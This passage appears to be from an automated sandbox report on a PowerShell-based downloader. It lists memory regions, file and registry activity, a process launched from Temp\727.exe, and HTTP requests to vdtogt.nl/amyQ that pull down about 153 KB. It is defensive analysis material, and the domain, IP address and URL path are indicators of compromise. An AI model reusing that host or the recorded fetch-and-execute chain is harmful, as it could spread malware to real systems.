|
|
- |
| private_0x0000000004340000 | 0x04340000 | 0x0434ffff | Private Memory | - |
|
|
|
- |
| private_0x0000000004350000 | 0x04350000 | 0x0435ffff | Private Memory | - |
|
|
|
- |
| powershell.exe | 0x21ca0000 | 0x21d11fff | Memory Mapped File | rwx |
|
|
|
- |
| culture.dll | 0x60340000 | 0x60347fff | Memory Mapped File | rwx |
|
|
|
- |
| system.directoryservices.ni.dll | 0x60c30000 | 0x60d43fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.ni.dll | 0x60d50000 | 0x60e53fff | Memory Mapped File | rwx |
|
|
|
- |
| system.xml.ni.dll | 0x60e60000 | 0x61395fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.utility.ni.dll | 0x613a0000 | 0x6153dfff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x61540000 | 0x61774fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x61780000 | 0x61ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x62000000 | 0x6279bfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x627a0000 | 0x63297fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x632a0000 | 0x6384afff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.management.ni.dll | 0x64d20000 | 0x64de2fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.dll | 0x64df0000 | 0x650d1fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.ni.dll | 0x66300000 | 0x6639bfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x666b0000 | 0x66734fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x66c10000 | 0x66c3cfff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.dll | 0x67aa0000 | 0x67ae2fff | Memory Mapped File | rwx |
|
|
|
- |
| system.configuration.install.ni.dll | 0x6e380000 | 0x6e3a4fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x6e3b0000 | 0x6e3fafff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x6e400000 | 0x6e480fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x6e490000 | 0x6e52afff | Memory Mapped File | rwx |
|
|
|
- |
| linkinfo.dll | 0x70870000 | 0x70878fff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x70880000 | 0x708adfff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x70980000 | 0x709f9fff | Memory Mapped File | rwx |
|
|
|
- |
| ntshrui.dll | 0x70d20000 | 0x70d8ffff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x70d90000 | 0x70d9afff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x72130000 | 0x7217bfff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x727a0000 | 0x727e9fff | Memory Mapped File | rwx |
|
|
|
- |
| shfolder.dll | 0x727f0000 | 0x727f4fff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x73d50000 | 0x73d59fff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x73d80000 | 0x73d93fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x740e0000 | 0x74100fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x747f0000 | 0x7482ffff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x74830000 | 0x74924fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74970000 | 0x74b0dfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74ee0000 | 0x74ee8fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x75040000 | 0x75056fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x75200000 | 0x7523afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75460000 | 0x75475fff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x75830000 | 0x75848fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x758e0000 | 0x758ebfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75990000 | 0x7599afff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a59fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x75a60000 | 0x75a86fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75bb0000 | 0x75bc1fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75c90000 | 0x75d2ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75d30000 | 0x75dfbfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x75e00000 | 0x75e82fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75fd0000 | 0x75fe8fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x75ff0000 | 0x76034fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76040000 | 0x760ebfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x760f0000 | 0x76d39fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76d40000 | 0x76d8dfff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x76dc0000 | 0x76f5cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77170000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77240000 | 0x772dcfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x77360000 | 0x773eefff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x773f0000 | 0x77490fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x774a0000 | 0x774f6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x77500000 | 0x7765bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77760000 | 0x77833fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77840000 | 0x7797bfff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x77980000 | 0x77984fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x779a0000 | 0x779befff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77a80000 | 0x77a80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 63 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Host Behavior
File (153)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR | type = file_attributes |
|
5 | |
| Get Info | C:\ | type = file_attributes |
|
4 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\Desktop | type = file_attributes |
|
8 | |
| Get Info | C:\Users | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\727.exe | type = file_attributes |
|
3 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 4096 |
|
17 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | size = 4096, size_out = 4096 |
|
4 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 4096 |
|
62 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 3895 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 201, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config | size = 4096, size_out = 4096 |
|
5 | |
| Write | - | size = 4096 |
|
3 | |
| Write | - | size = 8585 |
|
1 | |
| Write | - | size = 6124 |
|
1 | |
| Write | - | size = 11680 |
|
1 | |
| Write | - | size = 24820 |
|
1 | |
| Write | - | size = 61604 |
|
1 | |
| Write | - | size = 30547 |
|
1 |
Registry (106)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
3 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
2 | |
| Open Key | System | - |
|
1 | |
| Open Key | System\PowerShell | - |
|
1 | |
| Open Key | Windows PowerShell | - |
|
1 | |
| Open Key | Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
3 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\BGC6U8~1\AppData\Local\Temp\727.exe | show_window = SW_SHOWNORMAL |
|
1 |
Module (3)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
2 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = F71GWAT |
|
1 | |
| Get Info | type = Operating System |
|
4 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 |
Mutex (11)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\.net clr networking |
|
5 | |
| Open | mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
5 |
Environment (78)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
70 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\BGC6u8Oy yXGxkR |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\BGC6u8Oy yXGxkR |
|
1 | |
| Get Environment String | name = temp, result_out = C:\Users\BGC6U8~1\AppData\Local\Temp |
|
2 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
Network Behavior
DNS (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = vdtogt.nl, address_out = 62.204.93.18 |
|
1 |
HTTP Sessions (2)
| Information | Value |
|---|---|
| Total Data Sent | 103 bytes |
| Total Data Received | 153.01 KB |
| Contacted Host Count | 1 |
| Contacted Hosts | vdtogt.nl |
HTTP Session #1
| Information | Value |
|---|---|
| Server Name | vdtogt.nl |
| Server Port | 80 |
| Data Sent | 63 |
| Data Received | 564 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = vdtogt.nl, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /amyQ |
|
1 | |
| Send HTTP Request | headers = host: vdtogt.nl, connection: Keep-Alive, url = vdtogt.nl/amyQ |
|
1 | |
| Read Response | size = 4096, size_out = 564 |
|
1 |
HTTP Session #2
| Information | Value |
|---|---|
| Server Name | vdtogt.nl |
| Server Port | 80 |
| Data Sent | 40 |
| Data Received | 156114 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = vdtogt.nl, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /amyQ/ |
|
1 | |
| Send HTTP Request | headers = host: vdtogt.nl, url = vdtogt.nl/amyQ/ |
|
1 | |
| Read Response | size = 4096, size_out = 4096 |
|
1 | |
| Read Response | size = 65536, size_out = 9044 |
|
1 | |
| Read Response | size = 65536, size_out = 3752 |
|
1 | |
| Read Response | size = 65536, size_out = 6468 |
|
1 | |
| Read Response | size = 65536, size_out = 11680 |
|
1 | |
| Read Response | size = 65536, size_out = 24820 |
|
1 | |
| Read Response | size = 65536, size_out = 3752 |
|
1 | |
| Read Response | size = 65536, size_out = 61948 |
|
1 | |
